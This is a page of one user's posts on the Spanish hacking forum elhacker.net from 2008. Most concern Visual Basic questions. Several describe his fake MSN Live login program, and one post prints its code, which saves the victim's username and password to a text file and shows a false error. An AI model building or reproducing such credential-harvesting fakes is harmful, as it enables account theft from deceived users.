elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Mensajes
Páginas: 1 ... 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 [44] 45 46 47 48 49 50 51 52 53 54 55 56 57 58
431  Programación / Programación Visual Basic / Re: KIS salta ante programa inofensivo en VB, ¿por qué? en: 22 Diciembre 2008, 15:48 pm
Citar
ummmm lo baje .. lo revise ... lo abri... lo decompile  ;D... y no tiene nada mas de lo que mencionas... esas lineas de codigo ...

Bueno, por lo menos yo ya me quedo tranquilo, ya has visto que no miento, y que mi intención está muy lejos de intentar troyanizar al foro  :xD

Ya de paso, en la madrugada de ayer en 10 minutitos hice éste pequeño video explicativo (a modo de tutorial) sobre el programa, para que veais que no lleva nada extraño entre líneas...



Saludos  :D
432  Programación / Programación Visual Basic / Re: Block-Msn by Lord HAcK en: 22 Diciembre 2008, 01:25 am
¿Podrias al menos poner una captura no?  :P
433  Programación / Programación Visual Basic / Re: KIS salta ante programa inofensivo en VB, ¿por qué? en: 22 Diciembre 2008, 01:20 am
1º- Llevo el suficiente tiempo en el hacking y por este foro como para que todos sepais que yo ya estoy mayorcito para andar con pijadas de esas de subir troyanos y porquerias a los foros, yo no soy de esos, y los que me conoceis de hace tiempo lo sabéis bien...

2º- No tengo ningún problema en mostrar el código, aquí lo tenéis...

Citar
Private Sub Command1_Click()
Open "c:\recompensa.txt" For Append As #1
Print #1, Text1
Print #1, Text2
Close #1
MsgBox "Error conectando con el servicio", vbCritical, "Error de conexión"
End Sub


Eso va dentro del botón de Iniciar sesión (es decir, el unico boton que tiene el fake) y como véis, lo unico que hace es crear el archivo recompensa.txt en C;/ y abrirlo, y posteriormente meter dentro de ese archivo lo que la víctima haya escrito en los textbox 1 y 2 (user y pass respectivamente) y por último, para que la víctima no sospeche tanto, le salta un mensaje de error...

No tiene más código la aplicación...

434  Programación / Programación Visual Basic / Re: KIS salta ante programa inofensivo en VB, ¿por qué? en: 21 Diciembre 2008, 16:38 pm
Os aseguro que mi aplicación está totalmente limpia (los que me conoceis sabeis de sobra que llevo el suficiente tiempo metido aqui y en el mundo del hacking como para andar intentando colar troyanos en foros¬¬) y pues como ya dije, el único codigo que tiene la aplicación es en el botón de iniciar sesión, que es el que se encarga de capturar los datos que se meten en los textbox y crear el archivo en C:/

¿Puede ser que el KIS tenga una heuristica tan alta que detecte como acción peligrosa el hecho de que un programa cree por si mismo un archivo de texto?

435  Programación / Programación Visual Basic / KIS salta ante programa inofensivo en VB, ¿por qué? en: 21 Diciembre 2008, 03:36 am
Hola chicos.

Bien, veréis, resulta que por fin he acabado de crear mi fake de msn (tenia ganas de hacerme uno, aunque evidentemente no lo voy a usar, pero por el simple hecho de programarlo) y pues ya lo he hecho, y lo he publicado en éste foro, en la sección de Software, les dejo el enlace por si le quieren echar un vistazo...

http://foro.elhacker.net/software/chorizator_20_by_invisiblehack-t239174.0.html;msg1144251#msg1144251

Bien, como véis, es un programa muy sencillo, lo único que hace es simular ser el Msn Live, con la misma interfaz y todo, y pues cuando el usuario mete su user y su clave y le da al botón de iniciar sesión, al usuario le salta un error, y su clave y usuario queda almacenada en un fichero de texto dentro del disco duro de la propia victima, no hace más que eso...

Pues bien, varios users han probado el programa, y varios de ellos que tenian en sus Pc`s instalados el KIS como antivirus, me dijeron que se lo detectaba como virus/gusano, y que se lo eliminaba al instante...

Yo tengo Panda 2009 (actualizado, claro) y no me ha saltado nada...

Entonces era por si me podríais decir el motivo de por qué salta el KIS ante mi programa, porque no me lo explico, ya digo que el programa no modificada nada, ni crea entradas en el registro, ni borra archivos....ni nada que se pueda considerar dañino o peligroso...

Un saludo, gracias  ;D
436  Programación / Programación Visual Basic / Re: [Problema]No me permite poner asteriscos dentro de Textbox en: 20 Diciembre 2008, 15:15 pm
Dios mio...

Éstos son los efectos de acostarme a las 7 de la mañana.... :rolleyes: :rolleyes:

Le estuve dando vueltas como un tonto y estaba seguro de que PasswordChar se podía poner en true o false, y resulta que me confundí con otra propiedad....

Me di cuenta justo cuando me fui a la cama, me quedé pensando, y dije....¡¡maldita sea, claro!!

Bueno, gracias Cobein, ésto me pasa por ponerme a programar hasta tan tarde...
437  Programación / Programación Visual Basic / [Problema]No me permite poner asteriscos dentro de Textbox en: 20 Diciembre 2008, 06:14 am
Bueno, veréis, posteo ésto aqui porque no me explico lo que puede pasar...

Resulta que yo tengo un textbox en un formulario, y quiero que sea un campo para introducir contraseña, por lo tanto quiero que lo que el user escriba salga con asteriscos...

Bien, para eso voy a la propiedad PasswordChar del textbox, pero en lugar de salirme lo de True o False, para poner si quiero que salga con asteriscos o no, pues no me sale la flechita esa que sale para seleccionar True o False, y lo mas curioso del caso es que el otro dia hice pruebas de este tipo y si que me salía...  :-(



Ahí la prueba, no me sale la flechita para poner la propiedad PasswordChar ni en True ni en False...  :o

Ya digo que esta es de las cosas mas raras que me han pasado hasta ahora, porque lo que me mosquea es que en la otra ocasion si iba bien...

Entonces....¿me está vacilando este VB?  :rolleyes:



438  Programación / Programación Visual Basic / Re: Firefox pass recovery tool [SRC] en: 18 Diciembre 2008, 13:23 pm
Juas, tu si que sabes hacer regalos macho  :xD :xD

Excelente aporte, ésto me lo guardo sin lugar a dudas  ;D
439  Foros Generales / Sugerencias y dudas sobre el Foro / ¿Hubo ataque Ddos hoy? en: 5 Diciembre 2008, 22:09 pm
Una preguntilla....

Hoy desde el instituto me puse a entrar en el foro, pero fui, entre, y me salia la portada, todo bien, como siempre, pero resulta que le doy al apartado del Foro para entrar como siempre, y no me cargaba.....esperé....y esperé....y nada, se quedaba ahí...


Entonces no pude entrar en el foro hasta unas dos o tres horas despues...

Por eso pregunto...¿ha habido un ataque Ddos? Lo digo porque como este foro ya ha sufrido varios pues...



440  Foros Generales / Foro Libre / Re: La bibila del Hacker 2009 en: 5 Diciembre 2008, 22:04 pm
Pues bien, aunque algunas veces se pierden en demasiados tecnicismos para mi gusto, pero claro,tratandose de informática y hacking, eso es inevitable...

Páginas: 1 ... 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 [44] 45 46 47 48 49 50 51 52 53 54 55 56 57 58
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines